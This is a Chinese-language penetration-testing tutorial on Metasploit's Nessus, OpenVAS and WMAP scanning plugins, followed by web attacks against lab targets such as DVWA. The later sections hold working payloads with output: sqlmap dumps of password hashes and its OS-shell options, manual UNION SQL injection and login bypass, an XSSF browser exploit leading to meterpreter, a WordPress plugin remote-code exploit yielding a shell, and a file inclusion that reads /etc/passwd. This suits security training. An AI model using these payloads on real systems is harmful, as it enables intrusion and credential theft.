Metaspliot進行漏洞掃描

Metaspliot進行漏洞掃描

Metasploit框架是Metasploit項目中最著名的創做，是一個軟件開發、測試和利用漏洞的平臺。它能夠用來建立安全測試工具開發的模塊，也可利用模塊做爲一個滲透測試系統。最初是由HD Moore在2003年建立做爲一種便攜式網絡工具包。它是全部的安全研究人員和黑客之間最受歡迎的滲透測試工具之一。除了滲透測試，該工具還可以在網絡和Web應用程序中執行一個很好的漏洞評估。它有一些著名的安全漏洞掃描器如 Nessus、 Nexpose、 open VAS 和 WMAP 內置的插件。

在本文中，咱們要查看如何使用 Metasploit 內置插件來執行網絡和 web 應用程序的脆弱性評估。首先咱們將啓動Nessus，跳轉到msfconsole，咱們將看到如何在Backtrack中安裝 Nessus。它是很簡單的 ；只需執行一步一步的命令：

首先從Nessus其官方網站上下載Linux 版本並安裝它。而後註冊一個免費的許可證。在成功安裝後 Nessus，添加一個用戶，經過鍵入如下命令：/opt/nessus/sbin/nessus-adduser

觸發命令後，它將要求登陸用戶名和用戶密碼。爲用戶的特權，只需按照選項完成它。

如今咱們將註冊 Nessus 得到許可證。因此輸入 /opt/nessus/bin/nessus-fetch –register <YOUR LICENSE>

註冊以後，它會從它的官方網站開始下載全部最新的插件。這將須要一些時間來完成整個安裝。在此以後，它將能夠隨時使用。

因此，讓咱們啓動 msfconsole 和 load nessus .

正如咱們能夠在上圖中看到，咱們的Nessus插件加載成功。如今，輸入nessus_help，它會列出全部的Nessus的命令。

如今，咱們將鏈接到Nessus從咱們的本地主機開始掃描。用於鏈接到localhost，使用的命令是nessus_connect <你的用戶名>：<你的密碼>@localhost: 8834 < ok >，在這裏咱們使用的是nessus_connect rohit:toor@localhost:8834 ok .

正如咱們所看到的，咱們的Nessus進行身份驗證。如今，咱們將檢查Nessus的掃描策略。對於這一點，咱們輸入nessus_policy_list。

兩個策略??，"Internal Network Scan"和"External Network Scan"可供選擇（外部網絡和內部網絡)。首先是用於掃描內部網絡漏洞，而後是用於掃描外部網絡漏洞。

如今，咱們要掃描目標主機。首先，咱們要建立一個新的掃描。使用的命令是：nessus_scan_new <policy ID> <scan NAME> <Target IP>，例如，這裏咱們使用的是nessus_scan_new 2 NEW_SCAN 192.168.0.101,192.168.0.102

咱們能夠經過輸入nessus_scan_status檢查掃描過程的狀態，將會顯示咱們的掃描過程當中，狀態是否已經完成或沒有。在咱們的列子，掃描仍然在運行，因此咱們將等待一段時間。

過了一下子，咱們的掃描完成。如今，咱們將經過輸入nessus_report_list檢查咱們的報告，以下圖所示，咱們的掃描完成。

若要打開該報表，咱們使用命令 nessus_report_hosts < 報告 ID > ； 例如，在這裏咱們使用 nessus_report_hosts ff2b1531-6c18-0198-9029-59ddcdb6fc3f26566c9ad609d831：

在上面的截圖中咱們能夠看到主機 IP 192.168.0.101 的結果中有總共 85 嚴重性漏洞。這意味着安全漏洞的總數量是 85。

如下是不一樣漏洞的分類：

? Sev 0 表示高層次的漏洞;有0個。

? Sev 1 表示中等程度的漏洞;有53個。

? Sev 2 表示低級別的漏洞;有20個。

? Sev 3 表示信息漏洞;有12。

咱們能夠經過使用命令nessus_report_hosts_ports <Target IP> <Report ID>會看到漏洞的詳細協議名稱和服務，例如，這裏咱們使用的是nessus_report_host_ports 192.168.0.101 ff2b1531-6c18-0198-9029-59ddcdb6fc3f26566c9ad609d831：

如今，咱們將這份報告發送到Nessus的控制檯，因此在MSF中輸入：nessus_report_get ff2b1531-6c18-0198-9029 59ddcdb6fc3f26566c9ad609d831

正如在上面的圖中能夠看到，咱們的報告已成功導入。如今，經過Nessus的Web控制檯登錄，咱們可以看到咱們導入的報告。

   

Metaspliot進行漏洞掃描(2)-Openvas46+

在這篇文章中，咱們將看到如何使用Metasploit的內置插件來執行網絡和Web應用程序的脆弱性評估。首先，咱們將啓動OpenVAS和msfconsole以前，你必須在你的系統中安裝OpenVAS。在安裝過程當中給出的Backtrack的官方網站 http://www.backtrack-linux.org/wiki/index.php/OpenVas。只要按照步驟。如今咱們開始進入咱們的話題，如何經過OpenVAS進行漏洞評估。

要運行OpenVAS，在msfconsole輸入load openvas，它會從它的數據庫中加載並打開VAS插件。

如今，輸入openvas_help，它會顯示OpenVAS全部的命令。

咱們要經過命令openvas_connect鏈接到OpenVAS服務器，它會顯示完整的使用命令，這是openvas_connect username password host port <ssl-confirm> 用於鏈接到服務器。在個人狀況下，命令是openvas_connect rohit toor localhost 9390 ok

這咱們能夠在上圖中看到，咱們的OpenVAS鏈接成功。如今，咱們將建立掃描的目標。建立目標的命令是openvas_target_create <scan NAME> <target IP> <any comments>。在下面的圖中，咱們能夠看到個人掃描名稱是windows7的，目標是192.168.0.101和註釋是new_scan，因此命令是openvas_target_create"windows7″ 192.168.0.101″new_scan"

建立目標後，咱們但願看到OpenVAS的掃描配置列表，那麼請輸入openvas_config_list。

OpenVAS 有四種類型的掃描配置 ； 咱們將按要求選擇此選項。下一步輸入 openvas_target_list ，它將顯示您建立的目標。

如今咱們有一個目標，咱們也看到了掃描的配置，因此咱們將建立一個任務來掃描咱們的目標機器。

   

要建立任務，該命令是openvas_task_create <scanname> <COMMENT> <scanconfig ID> <targetID>

例如，在上面的圖中，咱們輸入openvas_task_create windows7 new_scan 3 1

咱們能夠看到，咱們建立的任何和任務ID，咱們的目標機器爲0。如今，經過輸入openvas_task_start <taskID>啓動任務。這裏咱們使用openvas_task_start 0

正如咱們所看到的，啓動命令後，咱們提交請求，這意味着咱們的掃描如今應該開始。讓咱們經過輸入open_vas_list檢查，它代表咱們的掃描狀態運行和進步是1，這意味着1％。

等待一段時間，並再次檢查進度。

如今進度是80％，這意味着它幾乎完整。當掃描完成後，進度將顯示-1。和狀態顯示"Done"。

如今咱們的掃描完成，因此咱們能夠下載該報告；輸入 openvas_report_list ，它將顯示數據庫中的全部報告。

有幾種格式供下載的報告。輸入openvas_format_list，它會列出全部可用的格式。

選擇格式後，咱們就可使用這個命令下載報告：openvas_report_download <report id> <format id> <path for saving report> <report name>。這裏咱們使用openvas_report_download 1 5 /root/Desktop report

該OpenVAS報告格式有一個bug：每當我試圖下載PDF或XML格式，它給出了空白報表，因此我再次下載該報告的HTML格式，這種格式是工做正常。

Metaspliot進行漏洞掃描(3)-wamp

在前面的文章中，咱們學會了如何使用OpenVAS插件來進行網絡脆弱性評估。在這種延續中，咱們將看到如何使用WMAP插件來執行Web應用程序漏洞評估。

WMAP最初是從一個名爲SQLMap的工具建立了一個功能豐富的Web漏洞掃描程序。該工具集成了Metasploit工具，使咱們可以從框架內進行web應用掃描。

啓動msfconsole和load WMAP

它會從它的數據庫中加載並打開WMAP插件。如今，輸入help，它會顯示WMAP全部使用的命令。

正如在上面的圖中能夠看出，wmap_sites命令是用來管理網站，因此咱們要使用這個命令。輸入wmap_sites -H ，它會顯示用於管理全部網站使用的選項。

在上圖中，咱們能夠看到，-a選項添加一個站點。所以，讓咱們使用這個選項添加一個站點。輸入wmap_site -a <目標>。在這裏，咱們在本地機器上託管的Web應用程序。這就是爲何咱們的目標IP是一個本地IP地址：wmap_sites -a http://192.168.0.102

一旦建立了該網站，咱們能夠檢查咱們添加的站點，經過輸入 wmap_sites-l 將會列出這些。

咱們網站已添加，如今咱們將添加目標。在第一次使用輸入 wmap_targets -h 命令來列出全部 wmap_targets 用法選項。

正如咱們能夠在使用選項看到，咱們能夠經過兩種方式添加咱們的目標。一個是-T，爲此咱們必須提供目標URL。若是咱們使用-D，咱們必須給出目標站點ID。在這裏，咱們將使用-d選項。所以咱們的命令是wmap_targets -D 0

添加目標ID後，咱們能夠看到它加載的目標地址。如今咱們能夠檢查列表，查看咱們的目標是增長，輸入wmap_targets -L

如今一切都準備好了，目標被成功添加，咱們能夠運行咱們的WMAP用於掃描Web應用程序。掃描命令wmap_run，可是，在運行此命令以前，檢查全部的使用方式選項。輸入wmap_run-H

咱們能夠在選項中看到，-t 是爲檢查全部啓用的模塊，用於掃描。因此輸入 wmap_run-t

觸發該命令後，它會顯示全部不一樣的測試模塊。

如今，鍵入wmap_run -E ，它會開始掃描全部啓用的模塊。

這將須要一些時間，具體取決於有多大的應用。掃描完成後，它會看起來像這樣。

如今，咱們能夠經過輸入vulns查詢全部漏洞。

咱們能夠看到在上圖中，在檢測到該應用程序上啓用跟蹤方法和脆弱性引用 CVE ID、 OSVD、 BID等，都顯示。

本文由InfoSecLab 整理翻譯，若有翻譯和編輯錯誤，請聯繫管理員，咱們將盡快處理，轉載請保留版權，謝謝，但願本文對你有所幫助。

MSF掃描結合web滲透攻擊技術

1.跨站腳本

反射型：利用郵件給受害者發送個惡意連接，受害者點擊時，惡意連接指向的服務器將注入的文件"反射"到受害者的瀏覽器上，並執行惡意文件。

存儲型：利用論壇、博客等web站點，將惡意腳本連同正常信息一塊兒注入帖子內容中，並隨帖子一塊兒存儲到論壇、博客服務器，當有用戶瀏覽該帖子時，惡意腳本將在瀏覽器上運行。

DOM型：構造一個URL連接，連接上包含有javascript等腳本，當受害者點擊這個URL時，將請求並執行腳本。

 

2.使用metasploit自帶的wmap web掃描器

msf > db_connect -y /opt/metasploit/config/database.yml

msf > load wmap

 

.-.-.-..-.-.-..---..---.

| | | || | | || | || |-'

`-----'`-'-'-'`-^-'`-'

[WMAP 1.5.1] ===  et [  ] metasploit.com 2012

[*] Successfully loaded plugin: wmap

 

wmap Commands

=============

 

    Command       Description

    -------       -----------

    wmap_modules  Manage wmap modules

    wmap_nodes    Manage nodes

    wmap_run      Test targets

    wmap_sites    Manage sites

    wmap_targets  Manage targets

    wmap_vulns    Display web vulns

 

添加目標網站

msf > wmap_sites -a http://10.10.10.129

 

msf > wmap_sites -l

 

添加掃描目標 

msf > wmap_targets -t http://10.10.10.129

 

查看將使用的模塊

msf > wmap_run -t

 

掃描並進行攻擊

msf > wmap_run -e

 

[*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.

[*] Module auxiliary/scanner/http/robots_txt

[*] [10.10.10.129] /robots.txt found

 

服務器的信息和敏感文件都找到了

 

再經過vulns查看漏洞信息

msf > vulns

[*] Time: 2013-10-22 00:56:24 UTC Vuln: host=10.10.10.129 name=HTTP Trace Method Allowed refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561 

[*] Time: 2013-10-22 00:06:40 UTC Vuln: host=10.10.10.130 name=Microsoft Server Service Relative Path Stack Corruption refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos 

 

結果仍是不錯的。

 

metasploit的滲透模塊在module中的文件夾下，主要集中在exploit/unix/webapp  exploit/windows/http  exploit/multi/http.

 

3.開源的web漏洞掃描工具

wapiti 對sql注入的掃描準確度排名第一

w3af 功能強大，配置繁瑣

sandcat 對XSS檢測效率最好

burp suite web滲透利器  

 

4.掃描神器w3af

支持讀入配置好的腳本文件，也能夠將下面一段直接複製進去

plugins

bruteforce

bruteforce formAuthBrute

bruteforce config formAuthBrute

set passwdFile True

set usersFile True

back

audit xss,sqli

discovery webSpider

discovery config webSpider

set onlyForward True

back

back

target

set target http://www.dvssc.com/dvwa/index.php

back

plugins

output htmlFile

output config htmlFile

set verbose True

set fileName aa.html

back

back

start

 

 

結果以下

SQL injection in a MySQL database was found at: "http://www.dvssc.com/dvwa/login.php", using HTTP method POST. The sent post-data was: "username=d'z"0&Login=Login&password=FrAmE30.". The modified parameter was "username". This vulnerability was found in the request with id 311.

 

URL : http://www.dvssc.com/dvwa/login.php

Severity : High

 

值得一提的是：w3af還有不少小工具保存在tools目錄下，如base64decode,md5hash等。

 

 

5.SQL注入漏洞的探測

登錄語句通常爲select * from * where user='**' and pass='**'

改爲這樣就直接繞過了

select * from * where user='admin' or '1=1'and pass='**' 即輸入admin' or '1=1

 

裏面有個專門用來學習sql注入的網頁，咱們試試sqlmap

root@bt:~# cd /pentest/database/sqlmap

 

在使用以前咱們須要知道referer 和cookie的值

可使用火狐的tamperdata，個人火狐版本較高，這個不兼容，這裏使用的是wireshark

 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45'

 

[10:29:07] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 

[10:29:07] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

[10:29:42] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

 

得到信息較詳細了

 

獲取數據庫名

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' --dbs -v 0

 

[10:38:55] [WARNING] reflective value(s) found and filtering out

available databases [2]:

[*] dvwa

[*] information_schema  mysql默認的

 

獲取表名

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables

[10:41:17] [WARNING] reflective value(s) found and filtering out

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users     |

+-----------+

 

獲取列名

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables -T users --columns

Database: dvwa

Table: users

[6 columns]

+------------+-------------+

| Column     | Type        |

+------------+-------------+

| avatar     | varchar(70) |

| first_name | varchar(15) |

| last_name  | varchar(15) |

| password   | varchar(32) |

| user       | varchar(15) |

| user_id    | int(6)      |

+------------+-------------+

 

導出password列的內容

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables -T users --columns --dump

 

recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n

Database: dvwa

Table: users

[5 entries]

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

| user_id | user    | avatar                                          | password                        | last_name | first_name |

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

| 1       | admin   | http://owaspbwa/dvwa/hackable/users/admin.jpg   | 21232f297a57a5a743894a0e4a801fc3 | admin     | admin      |

| 2       | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 | Brown     | Gordon     |

| 3       | 1337    | http://owaspbwa/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b | Me        | Hack       |

| 4       | pablo   | http://owaspbwa/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso   | Pablo      |

| 5       | smithy  | http://owaspbwa/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith     | Bob        |

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

 

剩下的就是破解MD5值了

 

值得一提的是，sqlmap 還支持經過數據庫注入一個交互的shell

 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -h | grep shell

    --os-shell          Prompt for an interactive operating system shell

    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC

--os-shell 提供四種不一樣的shell（ASP,ASPX,PHP,JSP）

 

咱們再試試手工注入

輸入1時

ID: 1

First name: admin

Surname: admin

 

說明這是個查詢 語句相似於： select firstname,surname from table where id='1'

 

輸入' or '1'='1'#

看到全部的結果

 

輸入1' order by 3#  出錯

說明表裏面只有兩列

 

mysql有個默認的數據庫information_schema,裏面有個叫tables的表，裏面保存了整個Mysql全部庫、表的信息

table_schema和table_name是其中表示庫名和表名的兩列

' union select 1,table_name from information_schema.tables#

 

這樣咱們就獲得了除系統自帶表之外的表了，這裏最後兩個是用戶本身添加的

ID: ID: ' union select table_schema,table_name from information_schema.tables#

First name: dvwa

Surname: guestbook

 

ID: ID: ' union select table_schema,table_name from information_schema.tables#

First name: dvwa

Surname: users

 

很輕鬆的獲得了庫名和表名，咱們關心的是users表

 

mysql默認的數據庫information_schema有張表還保存了每張表的列名，表名爲columns

意味着咱們還能查詢到users表的全部列名

' union select 1,column_name from information_schema.columns where table_name='users'#

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: user_id

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: first_name

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: last_name

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: user

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: password

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: avatar

 

那麼就剩下獲取字段的內容了

' union select user,password from dvwa.users#

 

ID: ' union select user,password from dvwa.users#

First name: admin

Surname: 21232f297a57a5a743894a0e4a801fc3

 

ID: ' union select user,password from dvwa.users#

First name: gordonb

Surname: e99a18c428cb38d5f260853678922e03

 

ID: ' union select user,password from dvwa.users#

First name: 1337

Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

 

ID: ' union select user,password from dvwa.users#

First name: pablo

Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

 

ID: ' union select user,password from dvwa.users#

First name: smithy

Surname: 5f4dcc3b5aa765d61d8327deb882cf99

 

ID: ' union select user,password from dvwa.users#

First name: user

Surname: ee11cbb19052e40b07aac0ca060c23ee

 

大功告成！

 

 

6.XSS漏洞探測 W3AF

 

plugins

audit xss

discovery webSpider

discovery config webSpider

set onlyForward True

back

back

target

set target http://www.dvssc.com/mutillidae/?page=add-to-your-blog.php

back

plugins

output htmlFile

output config htmlFile

set verbose True

set fileName mutillidae.html

back

back

start

 

結果是：

Cross Site Scripting was found at: "http://www.dvssc.com/mutillidae/index.php?page=add-to-your-blog.php", using HTTP method POST. The sent post-data was: "input_from_form=

 

URL : http://www.dvssc.com/mutillidae/index.php

Severity : Medium

 

7.web應用程序漏洞探測

wXf是一個web應用漏洞掃描和攻擊工具

https://github.com/WebExploitationFramework/wxf

 

BT5的Ruby版本有點低，在kali上能很好的運行

 

這裏面支持一個wordpress的掃描模塊

 

8.XSS跨站攻擊

javascript可以很好的增長網頁的豐富多樣性，於是使用仍是比較普遍的。

想成功執行一個XSS，須要兩個步驟：

1.攻擊者發送的數據沒有被過濾或是刪除。

2.web應用返回的數據沒有通過編碼。

 

對於一個安全的web應用來講，返回頁面的每個特殊字符包括&  < > 、 /都應該通過編碼，最好是進行16進制編碼。

 

針對http://www.dvssc.com/dvwa/vulnerabilities/xss_r這個網站

當咱們輸入

直接彈框XSS

很明顯的一個反射式跨站漏洞。

 

而存儲型的跨站攻擊並不須要直接對網站的某個輸入點進行輸入，而是長期存儲在web應用中並做爲一個內容。

 

對於存儲型的http://www.dvssc.com/dvwa/vulnerabilities/xss_s/

在發表文章的撰寫文章並提交，在輸入框中輸入

而這個js裏面就包括了獲取session和cookie的代碼。

 

當別人訪問你的文章時，信息就被竊取了。

 

 

9.跨站腳本攻擊框架XSSF

https://code.google.com/p/xssf/downloads/list下載

把裏面的四個文件夾data,lib,modules和plugin合併到/opt/framework/msf3裏面的文件夾

msf > load xssf

 

msf > xssf_urls

[+] XSSF Server : 'http://192.168.0.4:8888/' or 'http://:8888/'

[+] Generic XSS injection: 'http://192.168.0.4:8888/loop' or 'http://:8888/loop'

[+] XSSF test page : 'http://192.168.0.4:8888/test.html' or 'http://:8888/test.html'

 

以上就是咱們的攻擊配置文件

 

當咱們把連接 http://192.168.0.4:8888 經過存儲式跨站加入到博客裏面，當第三方瀏覽這個博客同時點擊這個連接時，就能看到點擊者的信息。

 

查看被攻擊者的信息

msf > xssf_victims

 

查看具體主機

msf > xssf_information 4

 

若是是低版本的IE瀏覽器

咱們可使用相關的攻擊模塊

msf > use auxiliary/server/browser_autopwn

 

接着是使用metasploit的反彈回連模塊

msf >jobs

 

msf >xssf_exploit 2 14

最後獲得一個meterpreter

 

10.命令注入攻擊

wordpress zingiri plugin滲透代碼，是一個php腳本

固然前提是wordpress裝有這個插件，而且還存在漏洞。

root@bt:~/Desktop# php exp.php 10.10.10.129 /wordpress/

 

+----------------------------------------------------------------------------------+

| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |

+----------------------------------------------------------------------------------+

 

zingiri-shell# 

zingiri-shell# id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

獲得了一個shell，可是這個shell和www-data這個帳號的權限是相同的，還不夠高

root:x:0:0:root:/root:/bin/bash

www-data:x:33:33:www-data:/var/www:/bin/sh

 

11.文件包含和文件上傳漏洞

針對文件包含漏洞的頁面，也許改個參數你就能知道不少信息

http://192.168.0.3/dvwa/vulnerabilities/fi/?page=include.php

改爲

http://192.168.0.3/dvwa/vulnerabilities/fi/?page=/etc/passwd

 

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false landscape:x:104:122::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:106:109:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash messagebus:x:107:114::/var/run/dbus:/bin/false tomcat6:x:108:115::/usr/share/tomcat6:/bin/false user:x:1000:1000:user,,,:/home/user:/bin/bash polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false haldaemon:x:110:119:Hardware abstraction layer,,,:/var/run/hald:/bin/false pulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false postfix:x:112:123::/var/spool/postfix:/bin/false 

 

這就有了不少信息了。

 

對於文件長傳漏洞，上傳特製的帶有webshell的文件，而後將page=提成遠程主機上webshell的url，這樣就有了webshell，能夠執行shell命令了。